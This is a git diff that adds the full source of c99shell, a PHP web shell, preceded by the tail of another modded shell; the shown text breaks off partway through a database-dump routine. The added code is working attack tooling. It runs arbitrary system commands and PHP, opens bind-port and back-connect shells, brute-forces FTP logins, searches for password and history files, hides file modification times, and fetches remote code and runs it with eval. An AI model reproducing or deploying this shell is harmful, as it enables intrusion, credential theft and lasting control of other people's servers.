+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ kira v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> KingDefacer @ msn. com| <a href="http://alturks.com"><font color="#FF0000">alturks Team</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); KingDefacerexit(); ?>
diff --git a/php/c99.php b/php/c99.php
new file mode 100644
index 0000000..dc6d688
--- /dev/null
+++ b/php/c99.php
@@ -0,0 +1,3069 @@
+<?php
+/*
+******************************************************************************************************
+*
+*					c99shell.php v.1.0 pre-release build #13
+*							Freeware license.
+*								© CCTeaM.
+*  c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ âçëîìà.
+*  Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
+   http://ccteam.ru/releases/c99shell
+*
+*  WEB: http://ccteam.ru
+*  ICQ UIN #: 656555
+*
+*  Ãñîáåííîñòè:
+*  + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
+*    çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
+*    (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar)
+*    ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
+*    modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè (äëÿ îòêë. ñì $filestealth)
+*  + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
+*  + êîäèðîâùèê äàííûõ ÷åðåç md5, unix-md5, sha1, crc32, base64
+*  + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÃÑ
+*  + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
+*    ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÃÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
+*  + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
+     òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
+     èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
+*  + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
+*    èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
+*  + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
+*  + àâòîìàòèçèðîâàíàÿ îòïðàâêà ñîîáùåíèé î íåäîðàáîòêàõ è ïîæåëàíèÿõ àâòîðó (÷åðåç mail())
+*
+*	Ãðèâåäåí äàëåêî íå ïîëíûé ñïèñîê âîçìîæíîñòåé.
+*
+*   Ãæèäàåìûå èçìåíåíèÿ:
+*  ~ Ãàçâèòèå sql-ìåíåäæåðà
+*  ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ
+*
+*  ~-~ Ãèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
+       â ICQ UIN #656555 ëèáî ÷åðåç ðàçäåë "feedback", áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
+*
+*  Last modify: 29.07.2005
+*
+*  © Captain Crunch Security TeaM. Coded by tristram
+*
+******************************************************************************************************
+*/
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 pre-release build #13"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
+
+$gzipencode = true; //Encode with gzip?
+
+$updatenow = false; //If true, update now (this variable will be false)
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
+
+$filestealth = true; //if true, don't change modify- and access-time
+
+$donated_html = "<center><b>Owned by hacker</b></center>";
+		/* If you publish free shell and you wish
+		add link to your site or any other information,
+		put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = true; //If true then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+	0 - files and folders (as default),
+	1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if true and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+									 // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
+ array("<b>Tools</b>",$surl."act=tools&d=%d"),
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"),
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>Sec.</b>",$surl."act=security&d=%d"),
+ array("<b>SQL</b>",$surl."act=sql&d=%d"),
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
+ array("<b>Update</b>",$surl."act=update&d=%d"),
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
+ array("<b>Self remove</b>",$surl."act=selfremove"),
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// 				\/	Next code isn't for editing	\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return false;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return false;}
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== false) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return false;}
+}
+}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate($update = true)
+{
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+ $data = @file_get_contents($url);
+ if (!$data) {return "Can't connect to update-server!";}
+ else
+ {
+  $data = ltrim($data);
+  $string = substr($data,3,ord($data{2}));
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+  if ($data{0} == "\x99" and $data{1} == "\x03")
+  {
+   $string = explode("\x01",$string);
+   if ($update)
+   {
+    $confvars = array();
+    $sourceurl = $string[0];
+    $source = file_get_contents($sourceurl);
+    if (!$source) {return "Can't fetch update!";}
+    else
+    {
+     $fp = fopen(__FILE__,"w");
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+    }
+   }
+   else {return "New version are available: ".$string[1];}
+  }
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
+  else {return "Error in protocol: segmentation failed! (".$data.") ";}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
